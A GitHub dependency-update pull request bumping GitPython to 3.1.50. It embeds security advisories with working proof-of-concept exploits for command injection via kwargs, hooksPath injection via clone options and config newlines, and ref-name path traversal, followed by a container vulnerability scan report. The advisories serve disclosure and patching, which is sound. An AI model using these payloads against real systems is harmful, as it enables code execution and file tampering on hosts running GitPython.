Skip to content

chore(deps): update dependency gitpython to v3.1.50 [security]#420

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-gitpython-vulnerability
Open

chore(deps): update dependency gitpython to v3.1.50 [security]#420
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-gitpython-vulnerability

Conversation

@renovate

@renovate renovate Bot commented May 5, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Update Change OpenSSF
GitPython patch ==3.1.46==3.1.50 OpenSSF Scorecard

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


GitPython has Command Injection via Git options bypass

CVE-2026-42215 / GHSA-rpm5-65cw-6hj4 / PYSEC-2026-2160

More information

Details

Summary

GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False.

Details

GitPython explicitly treats helper-command options as unsafe because they can be used to execute arbitrary commands:

  • git/repo/base.py:145-153 marks clone options such as --upload-pack, -u, --config, and -c as unsafe.
  • git/remote.py:535-548 marks fetch/pull/push options such as --upload-pack, --receive-pack, and --exec as unsafe.

The vulnerable API paths check the raw kwarg names before they're its normalized into command-line flags:

  • Repo.clone_from() checks list(kwargs.keys()) in git/repo/base.py:1387-1390
  • Remote.fetch() checks list(kwargs.keys()) in git/remote.py:1070-1071
  • Remote.pull() checks list(kwargs.keys()) in git/remote.py:1124-1125
  • Remote.push() checks list(kwargs.keys()) in git/remote.py:1197-1198

That validation is performed by Git.check_unsafe_options() in git/cmd.py:948-961. The validator correctly blocks option names such as upload-pack, receive-pack, and exec.

Later, GitPython converts Python kwargs into Git command-line flags in Git.transform_kwarg() at git/cmd.py:1471-1484. During that step, underscore-form kwargs are dashified:

  • upload_pack=... becomes --upload-pack=...
  • receive_pack=... becomes --receive-pack=...

Because the unsafe-option check runs before this normalization, underscore-form kwargs bypass the safety check even though they become the exact dangerous Git flags that the code is supposed to reject.

In practice:

  • remote.fetch(**{"upload-pack": helper}) is blocked with UnsafeOptionError
  • remote.fetch(upload_pack=helper) is allowed and reaches helper execution

The same bypass works for:

Repo.clone_from(origin, out, upload_pack=helper)
repo.remote("origin").fetch(upload_pack=helper)
repo.remote("origin").pull(upload_pack=helper)
repo.remote("origin").push(receive_pack=helper)

This does not appear to affect every unsafe option. For example, exec= is already rejected because the raw kwarg name exec matches the blocked option name before normalization.

Existing tests cover the hyphenated form, not the vulnerable underscore form. For example:

  • test/test_clone.py:129-136 checks {"upload-pack": ...}
  • test/test_remote.py:830-833 checks {"upload-pack": ...}
  • test/test_remote.py:968-975 checks {"receive-pack": ...}

Those tests correctly confirm the literal Git option names are blocked, but they do not exercise the normal Python kwarg spelling that bypasses the guard.

PoC
  1. Create and activate a virtual environment in the repository root:
python3 -m venv .venv-sec
.venv-sec/bin/pip install setuptools gitdb
source ./.venv-sec/bin/activate
  1. make a new python file and put the following in there, then run it:
import os
import stat
import subprocess
import tempfile

from git import Repo
from git.exc import UnsafeOptionError

##### Setup: create isolated repositories so the PoC uses a normal fetch flow.
base = tempfile.mkdtemp(prefix="gp-poc-risk-")
origin = os.path.join(base, "origin.git")
producer = os.path.join(base, "producer")
victim = os.path.join(base, "victim")
proof = os.path.join(base, "proof.txt")
wrapper = os.path.join(base, "wrapper.sh")

##### Setup: this wrapper is just to demo things you can do, not required for the exploit to work

##### you could also do something like an SSH reverse shell, really anything
with open(wrapper, "w") as f:
    f.write(f"""#!/bin/sh
{{
  echo "code_exec=1"
  echo "whoami=$(id)"
  echo "cwd=$(pwd)"
  echo "uname=$(uname -a)"
  printf 'argv='; printf '<%s>' "$@&#8203;"; echo
  env | grep -E '^(HOME|USER|PATH|SSH_AUTH_SOCK|CI|GITHUB_TOKEN|AWS_|AZURE_|GOOGLE_)=' | sed 's/=.*$/=<redacted>/' || true
}} > '{proof}'
exec git-upload-pack "$@&#8203;"
""")
os.chmod(wrapper, stat.S_IRWXU)

subprocess.run(["git", "init", "--bare", origin], check=True, stdout=subprocess.DEVNULL)
subprocess.run(["git", "clone", origin, producer], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

with open(os.path.join(producer, "README"), "w") as f:
    f.write("x")

subprocess.run(["git", "-C", producer, "add", "README"], check=True, stdout=subprocess.DEVNULL)
subprocess.run(
    ["git", "-C", producer, "-c", "user.name=t", "-c", "user.email=t@t", "commit", "-m", "init"],
    check=True,
    stdout=subprocess.DEVNULL,
)
subprocess.run(["git", "-C", producer, "push", "origin", "HEAD"], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.run(["git", "clone", origin, victim], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

repo = Repo(victim)
remote = repo.remote("origin")

##### the literal Git option name is properly blocked.
try:
    remote.fetch(**{"upload-pack": wrapper})
    print("control=unexpected_success")
except UnsafeOptionError:
    print("control=blocked")

##### this is the actual vulnerability

##### you can also just do upload_pack="touch /tmp/proof", the wrapper is just to show greater impact
##### if you do the "touch /tmp/proof" the script will crash, but the file will have been created
remote.fetch(upload_pack=wrapper)

##### Proof: the helper ran as the GitPython host process.
print("proof_exists", os.path.exists(proof), proof)
print(open(proof).read())
  1. Expected result:
  • The script prints control=blocked
  • The script prints proof_exists True ...
  • The proof file contains evidence that the attacker-controlled helper executed as the local application account, including id, working directory, argv, and selected environment variable names

Example output:

GitPython % python3 test.py
control=blocked
proof_exists True /var/folders/p4/kldmq4m13nd19dhy7lxs4jfw0000gn/T/gp-poc-risk-a1oftfku/proof.txt
code_exec=1
whoami=uid=501(wes) gid=20(staff) <redacted>
cwd=/private/var/folders/p4/kldmq4m13nd19dhy7lxs4jfw0000gn/T/gp-poc-risk-a1oftfku/victim
uname=Darwin  <redacted> Darwin Kernel Version  <redacted>; root:xnu-11417. <redacted>
argv=</var/folders/p4/kldmq4m13nd19dhy7lxs4jfw0000gn/T/gp-poc-risk-a1oftfku/origin.git>
USER=<redacted>
SSH_AUTH_SOCK=<redacted>
PATH=<redacted>
HOME=<redacted>

This PoC does not require a malicious repository. The PoC uses that fresh blank repository. The only attacker-controlled input is the kwarg that GitPython turns into --upload-pack.

Impact

Who is impacted:

  • Web applications that let users configure repository import, sync, mirroring, fetch, pull, or push behavior
  • Systems that accept a user-provided dict of "extra Git options" and pass it into GitPython with **kwargs
  • CI/CD systems, workers, automation bots, or internal tools that build GitPython calls from untrusted integration settings or job definitions (yaml, json, etc configs )

What the attacker needs to control:

  • A value that becomes upload_pack or receive_pack in the kwargs passed to Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push()

From a severity perspective, this could lead to

  • Theft of SSH keys, deploy credentials, API tokens, or cloud credentials available to the process
  • Modification of repositories, build outputs, or release artifacts
  • Lateral movement from CI/CD workers or automation hosts
  • Full compromise of the worker or service process handling repository operations

The highest-risk environments are network-reachable services and automation systems that expose these GitPython kwargs across a trust boundary while relying on the default unsafe-option guard for protection.

Severity

  • CVSS Score: 8.8 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


GitPython: Unsafe option check validates multi_options before shlex.split transformation

CVE-2026-42284 / GHSA-x2qx-6953-8485 / PYSEC-2026-2161

More information

Details

Summary

_clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (starts with --branch), but after split becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone.

Details

The vulnerable code is in git/repo/base.py line 1383:

multi = shlex.split(" ".join(multi_options))

Then validation runs on the original list at line 1390:

Git.check_unsafe_options(options=multi_options, unsafe_options=cls.unsafe_git_clone_options)

Then execution uses the transformed result at line 1392:

proc = git.clone(multi, "--", url, path, ...)

The check at git/cmd.py line 959 uses startswith:

if option.startswith(unsafe_option) or option == bare_option:

"--branch main --config ..." does not start with "--config", so it passes. After shlex.split, "--config" becomes its own token and reaches git.

Also affects Submodule.update() via clone_multi_options.

PoC
import sys, pathlib, subprocess
sys.path.insert(0, str(pathlib.Path(__file__).resolve().parent))

from git import Repo
from git.exc import UnsafeOptionError

try:
    Repo.clone_from("/nonexistent", "/tmp/x", multi_options=["--config", "core.hooksPath=/x"])
except UnsafeOptionError:
    print("multi_options=['--config', '...']: Block as expected")
except Exception:
    pass

DIR = pathlib.Path(__file__).resolve().parent / "workdir_b"
SRC = DIR / "repo"
DST = DIR / "dst"
HOOKS = DIR / "hooks"
LOG = DIR / "output.log"

if not SRC.exists():
    SRC.mkdir(parents=True)
    r = lambda *a: subprocess.run(a, cwd=SRC, capture_output=True)
    r("git", "init", "-b", "main")
    (SRC / "f").write_text("x\n")
    r("git", "add", ".")
    r("git", "commit", "-m", "init")

HOOKS.mkdir(exist_ok=True)
hook = HOOKS / "post-checkout"
hook.write_text(f"#!/bin/sh\nwhoami > {LOG.as_posix()}\nhostname >> {LOG.as_posix()}\n")
hook.chmod(0o755)

LOG.unlink(missing_ok=True)
payload = "--branch main --config core.hooksPath=" + HOOKS.as_posix()

try:
    Repo.clone_from(str(SRC), str(DST), multi_options=[payload])
except UnsafeOptionError:
    print(f"multi_options=['{payload}']: BLOCKED"); sys.exit(1)
except Exception:
    pass

if not LOG.exists() and DST.exists():
    subprocess.run(["git", "checkout", "--force", "main"], cwd=DST, capture_output=True)

print(f"multi_options=['{payload}']: not blocked")
print(f"\nHook executed: {LOG.exists()}")
if LOG.exists():
    print(LOG.read_text().strip())

Output:

multi_options=['--config', '...']: Block as expected
multi_options=['--branch main --config core.hooksPath=.../hooks']: not blocked

Hook executed: True
texugo
DESKTOP-5w5HH79
Impact

Any application passing user input to multi_options in clone_from(), clone(), or Submodule.update() is vulnerable. Attacker embeds --config core.hooksPath=<dir> inside a string starting with a safe option. Check does not block it. Git executes attacker code. Same class as CVE-2023-40267.

Severity

  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2026-42215 / GHSA-rpm5-65cw-6hj4 / PYSEC-2026-2160

More information

Details

GitPython is a python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47.

Severity

  • CVSS Score: 8.8 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


CVE-2026-42284 / GHSA-x2qx-6953-8485 / PYSEC-2026-2161

More information

Details

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.47, _clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (starts with --branch), but after split becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone. This issue has been patched in version 3.1.47.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


GitPython reference APIs has a path traversal vulnerability that allows arbitrary file write and delete outside the repository

CVE-2026-44243 / GHSA-7545-fcxq-7j24 / PYSEC-2026-2162

More information

Details

🧾 Summary

A vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations.


📦 Affected Versions
  • Affected: <= 3.1.46 and current main (3.1.47 in local checkout)

🧠 Details
Vulnerability Type

Path Traversal leading to Arbitrary File Write and Arbitrary File Deletion


Root Cause

Reference paths are validated when they are resolved for reading, but are not consistently validated before filesystem write, rename, and delete operations.

SymbolicReference._check_ref_name_valid() rejects traversal sequences such as .., but SymbolicReference.create, Reference.create, SymbolicReference.set_reference, SymbolicReference.rename, and SymbolicReference.delete still construct filesystem paths from attacker-controlled ref names without enforcing repository boundaries.


Affected Code
def set_reference(self, ref, logmsg=None):
    ...
    fpath = self.abspath
    assure_directory_exists(fpath, is_file=True)

    lfd = LockedFD(fpath)
    fd = lfd.open(write=True, stream=True)
    ...
@&#8203;classmethod
def delete(cls, repo, path):
    full_ref_path = cls.to_full_path(path)
    abs_path = os.path.join(repo.common_dir, full_ref_path)
    if os.path.exists(abs_path):
        os.remove(abs_path)
def rename(self, new_path, force=False):
    new_path = self.to_full_path(new_path)
    new_abs_path = os.path.join(_git_dir(self.repo, new_path), new_path)
    cur_abs_path = os.path.join(_git_dir(self.repo, self.path), self.path)
    ...
    os.rename(cur_abs_path, new_abs_path)

Attack Vector

Local attack through application-controlled input passed into GitPython reference APIs

Authentication Required

None at the library boundary. In practice, exploitation requires the ability to influence ref names supplied by the consuming application.


🧪 Proof of Concept
Setup
pip install GitPython==3.1.46
python poc.py

Exploit
import shutil
from pathlib import Path

from git import Repo
from git.refs.reference import Reference
from git.refs.symbolic import SymbolicReference

base = Path("gp-ghsa-poc").resolve()
if base.exists():
    shutil.rmtree(base)

repo_dir = base / "repo"
repo = Repo.init(repo_dir)

(repo_dir / "a.txt").write_text("init\n", encoding="utf-8")
repo.index.add(["a.txt"])
repo.index.commit("init")

outside_write = base / "outside_write.txt"
outside_delete = base / "outside_delete.txt"
outside_delete.write_text("DELETE ME\n", encoding="utf-8")

print(f"repo_dir       = {repo_dir}")
print(f"outside_write  = {outside_write}")
print(f"outside_delete = {outside_delete}")

Reference.create(repo, "../../../outside_write.txt", "HEAD")

print("\n[+] outside_write exists:", outside_write.exists())
if outside_write.exists():
    print("[+] outside_write content:")
    print(outside_write.read_text(encoding="utf-8"))

SymbolicReference.delete(repo, "../../../outside_delete.txt")

print("\n[+] outside_delete exists after delete:", outside_delete.exists())

Result
repo_dir       = ...\gp-ghsa-poc\repo
outside_write  = ...\gp-ghsa-poc\outside_write.txt
outside_delete = ...\gp-ghsa-poc\outside_delete.txt

[+] outside_write exists: True
[+] outside_write content:
<current HEAD commit SHA>

[+] outside_delete exists after delete: False

💥 Impact
What can an attacker do?
  • Create or overwrite files outside the repository metadata directory
  • Delete attacker-chosen files reachable from the process permissions
  • Corrupt application state or configuration files
  • Cause denial of service by deleting or overwriting important files

Security Impact
  • Confidentiality: Low
  • Integrity: High
  • Availability: High

Who is affected?
  • Applications that expose GitPython reference operations to user-controlled input
  • Git automation services, repository management backends, CI/CD helpers, and developer platforms
  • Multi-user environments where one user can influence ref names processed on behalf of another workflow

🛠️ Mitigation / Fix
Recommended Fix
def _validate_ref_write_path(repo, path, *, for_git_dir=False):
    SymbolicReference._check_ref_name_valid(path)

    base = Path(repo.git_dir if for_git_dir else repo.common_dir).resolve()
    target = (base / path).resolve()

    if base not in [target, *target.parents]:
        raise ValueError(f"Reference path escapes repository boundary: {path}")

    return str(target)
full_ref_path = cls.to_full_path(path)
_validate_ref_write_path(repo, full_ref_path)

Severity

  • CVSS Score: 7.8 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2026-44243 / GHSA-7545-fcxq-7j24 / PYSEC-2026-2162

More information

Details

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath

CVE-2026-44244 / GHSA-v87r-6q3f-2j67 / PYSEC-2026-2163

More information

Details

GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path.

The vulnerability is not merely malformed config output: GitPython's own writer converts embedded newlines into indented continuation lines, but Git still accepts an indented [core] stanza as a section header, so the injected core.hooksPath becomes effective configuration.

This was found while auditing MLRun's project.push() method, which passes author_name and author_email directly to config_writer().set_value() with no sanitization. Both parameters cross a trust boundary — they are caller-supplied API inputs that end up in .git/config.

PoC (standalone, no MLRun required):

import git, subprocess, os

repo = git.Repo("/tmp/testrepo")

with repo.config_writer() as cw:
    cw.set_value("user", "name", "foo\n[core]\nhooksPath=/tmp/hooks")

r = subprocess.run(["git", "config", "core.hooksPath"], cwd="/tmp/testrepo", capture_output=True, text=True)
assert r.returncode == 0
print(r.stdout.strip())  # /tmp/hooks

os.makedirs("/tmp/hooks", exist_ok=True)
open("/tmp/hooks/pre-commit", "w").write("#!/bin/sh\nid > /tmp/pwned\n")
os.chmod("/tmp/hooks/pre-commit", 0o755)

repo.index.add(["README"])
repo.git.commit(m="test")
print(open("/tmp/pwned").read())  # uid=...

Tested on GitPython 3.1.46, git 2.39+.

Impact: This is persistent repo config poisoning. Any user who can supply author_name or author_email to an application calling config_writer().set_value() can redirect Git hook execution to an arbitrary path. In a multi-user or hosted environment (e.g. a shared MLRun server where multiple users push to the same repositories), one user can poison the .git/config of a shared repo and have their hooks run in the context of every subsequent Git operation by any user. On single-user deployments, the impact depends on whether the application later invokes Git hooks automatically.

Remediation: set_value() should raise on CR, LF, or NUL in values rather than silently pass them through:

import re

if isinstance(value, (str, bytes)) and re.search(r"[\r\n\x00]", str(value)):
    raise ValueError("Git config values must not contain CR, LF, or NUL")

Rejecting is safer than stripping — a stripped newline might indicate the caller is passing unsanitized input at a higher level, and silent normalization masks that.

Affected wherever config_writer().set_value(section, key, user_input) is called with external input.** GitPython is a dependency of DVC, MLflow, Kedro, and others — worth auditing their set_value() call sites for externally influenced inputs.

Severity

  • CVSS Score: 7.8 / 10 (High)
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2026-44244 / GHSA-v87r-6q3f-2j67 / PYSEC-2026-2163

More information

Details

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.

Severity

  • CVSS Score: 7.8 / 10 (High)
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


GitPython: Newline injection in config_writer() section parameter bypasses CVE-2026-42215 patch, enabling RCE via core.hooksPath

GHSA-mv93-w799-cj2w

More information

Details

Summary

The patch for CVE-2026-42215 (GitPython 3.1.49) validates newlines only in the value parameter of set_value(). The section and option parameters are passed to configparser without any newline validation. An attacker who controls the section argument can inject \n to write arbitrary section headers into .git/config, including a forged [core] section with hooksPath pointing to an attacker-controlled directory, leading to RCE when any git hook is triggered.

Details

File: git/config.py — GitPython 3.1.49 (latest patched version)

  def set_value(self, section: str, option: str, value) -> "GitConfigParser":
      value_str = self._value_to_string_safe(value)   # only value is validated
      if not self.has_section(section):
          self.add_section(section)                    # section not validated
      super().set(section, option, value_str)          # option not validated
      return self

_write() formats section headers as "[%s]\n" % name. When section = "user]\n[core", this writes [user]\n[core]\n — two valid section headers — into .git/config.

PoC

  import git, os, subprocess

  repo = git.Repo.init("/tmp/bypass_test")

  os.makedirs("/tmp/evil_hooks", exist_ok=True)
  with open("/tmp/evil_hooks/pre-commit", "w") as f:
      f.write("#!/bin/sh\nid > /tmp/rce_proof.txt\n")
  os.chmod("/tmp/evil_hooks/pre-commit", 0o755)

  # Inject newline into section parameter (not value — already patched)
  with repo.config_writer() as cw:
      cw.set_value("user]\n[core", "hooksPath", "/tmp/evil_hooks")

  r = subprocess.run(["git", "-C", "/tmp/bypass_test", "config", "core.hooksPath"],
                     capture_output=True, text=True)
  print(r.stdout.strip())  # → /tmp/evil_hooks

  subprocess.run(["git", "-C", "/tmp/bypass_test", "commit", "--allow-empty", "-m", "x"])
  print(open("/tmp/rce_proof.txt").read())  # → uid=1000(...) RCE confirmed

Impact

Same attack outcome as CVE-2026-42215 (RCE via core.hooksPath injection). The patch is incomplete — only value is validated while section and option remain injectable.

Severity

  • CVSS Score: 7.0 / 10 (High)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

gitpython-developers/GitPython (GitPython)

v3.1.50

Compare Source

What's Changed

New Contributors

Full Changelog: gitpython-developers/GitPython@3.1.49...3.1.50

v3.1.49: - Security

Compare Source

What's Changed

Full Changelog: gitpython-developers/GitPython@3.1.48...3.1.49

v3.1.48: - Security

Compare Source

Accidentally deleted the previous GH release, it did mention the advisory this fixes.

What's Changed

Full Changelog: gitpython-developers/GitPython@3.1.47...3.1.48

v3.1.47: - with security fixes

Compare Source

Advisories

What's Changed

New Contributors

Full Changelog: gitpython-developers/GitPython@3.1.46...3.1.47


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
renovate Bot requested a review from Djaytan as a code owner May 5, 2026 18:43
@renovate renovate Bot added the t:security label May 5, 2026
@github-actions

github-actions Bot commented May 5, 2026

Copy link
Copy Markdown

Overview

Image reference djaytan/papermc-server:1.21.11 djaytan/papermc-server:test
- digest c78edd932156 0f5f372484a2
- tag 1.21.11 test
- stream latest
- vulnerabilities critical: 3 high: 35 medium: 29 low: 3 critical: 3 high: 40 medium: 31 low: 4
- platform linux/amd64 linux/amd64
- size 82 MB 147 MB (+65 MB)
- packages 93 176 (+83)
Base Image alpine:3
also known as:
3.23
latest
alpine:3
also known as:
3.23
latest
- vulnerabilities critical: 1 high: 7 medium: 3 low: 1 critical: 1 high: 7 medium: 3 low: 1
Policies (0 improved, 2 worsened, 3 missing data)
Policy Name djaytan/papermc-server:1.21.11 djaytan/papermc-server:test Change Standing
No unapproved base images ❓ No data ❓ No data
Default non-root user No Change
No AGPL v3 licenses No Change
No fixable critical or high vulnerabilities ⚠️ 31 ⚠️ 43 +12 Worsened
No high-profile vulnerabilities No Change
No outdated base images ❓ No data ❓ No data
SonarQube quality gates passed ❓ No data ❓ No data
Supply chain attestations ⚠️ 2 +2 Worsened
Packages and Vulnerabilities (106 package changes and 8 vulnerability changes)
  • ➕ 93 packages added
  • ➖ 12 packages removed
  • ♾️ 1 packages changed
  • 77 packages unchanged
  • ❗ 8 vulnerabilities added
Changes for packages of type apk (8 changes)
Package Version
djaytan/papermc-server:1.21.11
Version
djaytan/papermc-server:test
alpine-base 3.23.3-r0
ca-certificates 20251003-r0
gcc 15.2.0-r2
ncurses 6.5_p20251123-r0
openssl 3.5.5-r0
critical: 1 high: 6 medium: 0 low: 0
Added vulnerabilities (7):
  • critical : CVE--2026--31789
  • high : CVE--2026--28387
  • high : CVE--2026--31790
  • high : CVE--2026--28390
  • high : CVE--2026--28389
  • high : CVE--2026--28388
  • high : CVE--2026--2673
pax-utils 1.3.8-r2
xz 5.8.2-r0
critical: 0 high: 0 medium: 0 low: 1
Added vulnerabilities (1):
  • low : CVE--2026--34743
♾️ xz-libs 5.8.3-r0 5.8.2-r0
Changes for packages of type generic (2 changes)
Package Version
djaytan/papermc-server:1.21.11
Version
djaytan/papermc-server:test
openjdk 21.0.10
openjdk 21.0.10
Changes for packages of type golang (20 changes)
Package Version
djaytan/papermc-server:1.21.11
Version
djaytan/papermc-server:test
cuelabs.dev/go/oci/ociregistry 0.0.0-20250304105642-27e071d2c9b1
cuelabs.dev/go/oci/ociregistry 0.0.0-20250304105642-27e071d2c9b1
github.com/cenkalti/backoff/v5 5.0.3
github.com/cenkalti/backoff/v5 5.0.3
github.com/cespare/xxhash/v2 2.3.0
github.com/cespare/xxhash/v2 2.3.0
github.com/cockroachdb/apd/v3 3.2.1
github.com/cockroachdb/apd/v3 3.2.1
github.com/grpc-ecosystem/grpc-gateway/v2 2.27.7
github.com/grpc-ecosystem/grpc-gateway/v2 2.27.7
github.com/pelletier/go-toml/v2 2.2.4
github.com/pelletier/go-toml/v2 2.2.4
go.opentelemetry.io/contrib/instrumentation/runtime 0.65.0
go.opentelemetry.io/contrib/instrumentation/runtime 0.65.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc 1.40.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc 1.40.0
go.opentelemetry.io/otel/sdk/metric 1.40.0
google.golang.org/genproto/googleapis/api 0.0.0-20260203192932-546029d2fa20
google.golang.org/genproto/googleapis/rpc 0.0.0-20260203192932-546029d2fa20
google.golang.org/genproto/googleapis/rpc 0.0.0-20260203192932-546029d2fa20
Changes for packages of type maven (76 changes)
Package Version
djaytan/papermc-server:1.21.11
Version
djaytan/papermc-server:test
AutoRenamingTool/AutoRenamingTool 2.0.3
ansi/ansi 1.1.1
asm-utils/asm-utils 0.0.3
cli-utils/cli-utils 2.1.4
com.google.errorprone/error_prone_annotations 2.41.0
com.google.guava/listenablefuture 9999.0-empty-to-avoid-conflict-with-guava
com.google.j2objc/j2objc-annotations 3.1
com.google.protobuf/protobuf-java 4.29.0
com.googlecode.json-simple/json-simple 1.1.1
com.lmax.disruptor/disruptor 3.4.4
com.mysql/mysql-connector-j 9.2.0
commons-codec/commons-codec 1.16.0
commons-lang/commons-lang 2.6
critical: 0 high: 0 medium: 1 low: 0
Added vulnerabilities (1):
  • medium : CVE--2025--48924
concurrentutil/concurrentutil 0.0.8
examination-api/examination-api 1.3.0
examination-string/examination-string 1.3.0
gson-io/gson-io 2.0.17
io.leangen.geantyref/geantyref 1.3.16
io.netty/netty-codec-haproxy 4.2.7.Final
io.papermc.paperclip.Main/papermc-server 1.21.11-69
io.sigpipe/jbsdiff 1.0
net.kyori.adventure.key/adventure-key 4.25.0
net.kyori.adventure.text.logger.slf4j/adventure-text-logger-slf4j 4.25.0
net.kyori.adventure.text.minimessage/adventure-text-minimessage 4.25.0
net.kyori.adventure.text.serializer.ansi/adventure-text-serializer-ansi 4.25.0
net.kyori.adventure.text.serializer.constant/adventure-text-serializer-commons 4.25.0
net.kyori.adventure.text.serializer.gson/adventure-text-serializer-gson 4.25.0
net.kyori.adventure.text.serializer.json/adventure-text-serializer-json 4.25.0
net.kyori.adventure.text.serializer.legacy/adventure-text-serializer-legacy 4.25.0
net.kyori.adventure.text.serializer.plain/adventure-text-serializer-plain 4.25.0
net.kyori.adventure/adventure-api 4.25.0
net.md-5/bungeecord-chat 1.21-R0.2
net.minecrell.terminalconsole/terminalconsoleappender 1.3.0
option/option 1.1.0
org.apache.commons/commons-compress 1.5
critical: 0 high: 4 medium: 1 low: 0
Added vulnerabilities (5):
  • high : CVE--2021--36090
  • high : CVE--2021--35517
  • high : CVE--2021--35516
  • high : CVE--2021--35515
  • medium : CVE--2024--25710
org.apache.httpcomponents/httpclient 4.5.14
org.apache.httpcomponents/httpcore 4.4.16
org.apache.logging.log4j/log4j-iostreams 2.24.1
org.apache.maven.resolver/maven-resolver-api 1.9.18
org.apache.maven.resolver/maven-resolver-connector-basic 1.9.18
org.apache.maven.resolver/maven-resolver-impl 1.9.18
org.apache.maven.resolver/maven-resolver-named-locks 1.9.18
org.apache.maven.resolver/maven-resolver-spi 1.9.18
org.apache.maven.resolver/maven-resolver-transport-http 1.9.18
org.apache.maven.resolver/maven-resolver-util 1.9.18
org.apache.maven/maven-artifact 3.9.6
org.apache.maven/maven-builder-support 3.9.6
org.apache.maven/maven-model 3.9.6
org.apache.maven/maven-model-builder 3.9.6
org.apache.maven/maven-repository-metadata 3.9.6
org.apache.maven/maven-resolver-provider 3.9.6
org.bukkit/paper-api 1.21.11-R0.1-SNAPSHOT
org.codehaus.plexus/plexus-interpolation 1.26
org.codehaus.plexus/plexus-utils 3.5.1
critical: 0 high: 1 medium: 0 low: 0
Added vulnerabilities (1):
  • high : CVE--2025--67030
org.eclipse.sisu/org.eclipse.sisu.inject 0.9.0.M2
org.jline/jline-native 3.27.1
org.jline/jline-reader 3.20.0
org.jline/jline-terminal 3.27.1
org.jline/jline-terminal-ffm 3.27.1
org.jline/jline-terminal-jni 3.27.1
org.objectweb.asm.commons/asm-commons 9.8
org.objectweb.asm.tree/asm-tree 9.8
